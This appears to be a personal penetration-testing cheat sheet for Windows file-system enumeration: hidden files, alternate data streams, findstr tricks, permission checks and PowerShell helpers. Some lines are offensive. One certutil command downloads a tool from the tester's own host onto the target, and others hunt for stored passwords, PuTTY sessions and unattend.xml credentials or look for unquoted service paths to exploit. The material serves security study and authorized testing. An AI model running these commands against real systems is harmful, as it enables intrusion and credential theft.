akde/infosec

Information security is ultimately about managing risk


dir

General:

  • For all commands: Use /p to get a pause for large outputs to scroll over!
  • Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a! Every time! Use /a!

Usual commands:

  • Search recursively:
    dir /s /a *.txt
  • Show hidden files:
    dir /ah
  • Show system files:
    dir /as
  • Show file ownership information:
    dir /q
  • Show everything, whatever the attributes (hidden, system, …):
    dir /a
    (In PowerShell, where dir is an alias for Get-ChildItem, the equivalent is dir -Force; cmd.exe's dir does not understand -force and treats it as a file name.)
  • Show also alternate data streams:
    dir /R
    • Read alternate data streams: If a file is listed like root.txt:root.txt:$DATA, then you can read the stream with more (yes, on Windows):
      more < root.txt:root.txt:$DATA

Therefore: Remember to use dir /R /a (or, in PowerShell, dir -Force).
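The same stream enumeration as objects, so the result can be filtered and swept over a whole tree. This is an added example, not code from the original page; it constructs a sample file with an extra stream in %TEMP% so it runs offline, and the stream name hidden is an assumption of the sample.

```powershell
# Added example, not from the original page: list alternate data streams the way
# dir /R does, but as objects, and read one back. A sample file with an extra
# stream is constructed in %TEMP% so the snippet runs offline.
$file = Join-Path $env:TEMP 'ads_sample.txt'
Set-Content -LiteralPath $file -Value 'visible content'
Set-Content -LiteralPath $file -Stream 'hidden' -Value 'only visible through the stream'

# Every stream on the file. ':$DATA' is the ordinary unnamed stream; anything
# else is an ADS worth a look (Zone.Identifier is the mark on downloaded files).
Get-Item -LiteralPath $file -Stream * | Select-Object FileName, Stream, Length

# Read a named stream; the cmd.exe equivalent is: more < ads_sample.txt:hidden:$DATA
Get-Content -LiteralPath $file -Stream 'hidden'

# Sweep a directory tree for files carrying any stream other than the default one.
Get-ChildItem -LiteralPath $env:TEMP -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
    Where-Object { $_.Stream -ne ':$DATA' } |
    Select-Object FileName, Stream, Length

# Clean up the constructed sample.
Remove-Item -LiteralPath $file
```

Streams only exist on NTFS; on FAT/exFAT volumes the -Stream parameter has nothing to report.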

tree

Start with creating a list of all directories and files. Download it. It’s way easier to look in a local editor and it’s stored for the future as well.

tree c:\ > C:\Windows\Temp\dsys\dirs.txt
dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt
(Download the files)

find (=grep)

Search for a string in an output, e.g. in a directory listing:

dir | find "eyfile"

Search one string in a single file ($file stands for the file name):

find "assword" $file

Search for any of several strings in a single file (strings separated by spaces are ORed; note: findstr supports regular expressions):

findstr "assword eyfile" $file

Grab line 101 from a large text file: Use findstr /n to output the text file with line numbers, then filter for your number. Anchoring on "^101:" avoids hits on lines 1101, 10101 and on lines that merely contain 101 (use ^^ as the search string to number every line of the file):

findstr /n $searchstring $file | findstr "^101:"

Find a string in a large file / output and get the lines around it. First search for the string to determine its line number (findstr /n ^^ numbers every line; ^^ passes a literal ^ through cmd.exe's escaping; here the hit is at line 32318):

type d.txt | findstr /n ^^ | findstr "Igor"

Then filter on the leading digits of that line number: "^323" matches lines 32300–32399 (plus 323 and 3230–3239), i.e. roughly 100 lines around the hit:

type d.txt | findstr /n ^^ | findstr "^323"

wc (word count)

There is no wc command for Windows, but with the following, a line count can be displayed (find /c counts the lines that do not (/v) match the empty string, i.e. all of them):

type $largefile | find /c /v ""
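The line-number, context and line-count tricks above, done in PowerShell, where Select-String carries the line number and surrounding lines with each hit. This is an added example and not code from the original page; it constructs a 500-line sample file in %TEMP% (with a hit placed at line 323) so it runs offline, and $path is meant to be repointed at the file actually being inspected.

```powershell
# Added example, not from the original page: PowerShell equivalents of the
# findstr /n line-number trick and the missing wc. A 500-line sample file is
# constructed in %TEMP%; point $path at the file you are actually inspecting.
$path = Join-Path $env:TEMP 'sample_d.txt'
$lines = 1..500 | ForEach-Object { "line $_ of the sample" }
$lines[322] = 'line 323 mentions Igor'          # constructed hit at line 323
Set-Content -LiteralPath $path -Value $lines

# 1) Find the string, get its 1-based line number and 3 lines of context each side.
#    With several hits Select-String returns one MatchInfo per hit; take the first.
$hit = Select-String -LiteralPath $path -Pattern 'Igor' -Context 3,3 | Select-Object -First 1
"Found at line $($hit.LineNumber): $($hit.Line)"
$hit.Context.PreContext    # the 3 lines before the hit
$hit.Context.PostContext   # the 3 lines after the hit

# 2) Grab an arbitrary line (line 101) directly, streaming so a large file is
#    not read into memory in one piece. -Index is 0-based.
Get-Content -LiteralPath $path | Select-Object -Index 100

# 3) wc -l equivalent: count every line, blank ones included (same result as
#    find /c /v ""), again streaming through the pipeline.
(Get-Content -LiteralPath $path | Measure-Object).Count

# Clean up the constructed sample.
Remove-Item -LiteralPath $path
```

Select-String treats -Pattern as a regular expression by default; add -SimpleMatch when the search string contains regex metacharacters.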

File system permissions

Check permissions with icacls:

icacls file.exe

Manual directory inspection

Now, check the following directories:

  • C:\Users
  • C:\Program Files [(x86)]
    • Create a list with each non-standard program.
    • Search for exploits.
    • Search for sensitive information in
      • the files within the program directory (/s recursive, /p skips files with non-printable characters, /i case-insensitive, /n prints line numbers):
        findstr /spin "assword" *.*
      • the registry (look up the product's registry paths online), e.g. stored PuTTY sessions:
        reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
    • Check if program files are writeable:
      certutil.exe -urlcache -split -f "http://$ownIP/accesschk.exe" accesschk.exe
      accesschk.exe /accepteula -uws "Everyone" "C:\Program Files"
    • Check for unquoted service paths. E.g. for C:\Program Files\app 2\app.exe, Windows tries these first:
      • C:\Program.exe
      • C:\Program Files\app.exe
  • C:\Inetpub (or another server directory)
  • Possible interesting files:
    %windir%\debug\NetSetup.log #AD domain name, DC name, internal IP, DA account
  • Check drives with wmic logicaldisk get caption || fsutil fsinfo drives (the || falls back to fsutil if wmic is unavailable) and then D:\ E:\ …
  • Look into the trash:
    dir C:\$Recycle.Bin /s /b /R
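An audit helper for the unquoted service path item above: it reproduces the lookup order Windows applies to an unquoted image path containing spaces (each prefix before a space is tried as <prefix>.exe first) and reports the services whose path should be quoted. This is an added example, not code from the original page; the service entries are constructed samples shaped like Win32_Service objects, the function names are my own, and the helper assumes .exe images (driver paths without .exe are not special-cased).

```powershell
# Added example, not from the original page: an audit helper that reproduces the
# lookup order Windows applies to an unquoted, space-containing service image path
# and lists the services whose path needs quoting. The service entries are
# constructed samples; the commented-out line reads the real ones.
function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)

    # A quoted path is resolved unambiguously, so nothing to report.
    if ($PathName.StartsWith('"')) { return @() }
    # Keep only the executable part, dropping any trailing arguments
    # (assumes a .exe image; other extensions pass through unchanged).
    $exe = $PathName -replace '\.exe\b.*$', '.exe'
    if ($exe -notmatch ' ') { return @() }

    # At every space Windows first tries "<text before the space>.exe" before
    # reading on, so each prefix is a path that would be executed if it existed.
    $candidates = @()
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $candidates += $exe.Substring(0, $idx) + '.exe'
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
    return $candidates
}

function Test-ServicePaths {
    param([Parameter(Mandatory)][object[]]$Services)
    foreach ($svc in $Services) {
        $cands = @(Get-UnquotedPathCandidates -PathName $svc.PathName)
        if ($cands.Count -gt 0) {
            [pscustomobject]@{
                Name       = $svc.Name
                PathName   = $svc.PathName
                TriedFirst = $cands -join ' ; '
            }
        }
    }
}

# Constructed sample entries shaped like Win32_Service objects.
$sampleServices = @(
    [pscustomobject]@{ Name = 'GoodSvc'; PathName = '"C:\Program Files\Good App\good.exe" -svc' }
    [pscustomobject]@{ Name = 'Svchost'; PathName = 'C:\WINDOWS\system32\svchost.exe -k netsvcs' }
    [pscustomobject]@{ Name = 'WeakSvc'; PathName = 'C:\Program Files\app 2\app.exe' }
)
# Only WeakSvc is reported, with TriedFirst = C:\Program.exe ; C:\Program Files\app.exe
Test-ServicePaths -Services $sampleServices | Format-List
# Real services on this host (run elevated for the full list):
# Test-ServicePaths -Services (Get-CimInstance Win32_Service | Select-Object Name, PathName)
```

The fix for a reported service is to quote its path, e.g. sc.exe config WeakSvc binPath= "\"C:\Program Files\app 2\app.exe\"" (the space after binPath= is required by sc.exe), after which the helper no longer reports it.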

Advanced

  • Search for files within an interesting time window:
    powershell.exe -ExecutionPolicy ByPass -command "& { Get-ChildItem -ErrorAction SilentlyContinue -Path c:\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date '16 Mar 2017 00:00') } | Where-Object -FilterScript { $_.LastWriteTime -lt (Get-Date '18 Mar 2017 00:00') } }"
  • Find password strings:
    findstr /si password *.*
  • Find recently changed files:
    Get-ChildItem -Path c:\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date).AddHours(-24) }
  • Search for unattend.xml files / provisioning files. These files are often created by Windows for background jobs and could contain credentials (cmd.exe syntax; /a includes hidden and system files):
    dir /s /a *nattend.xml

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
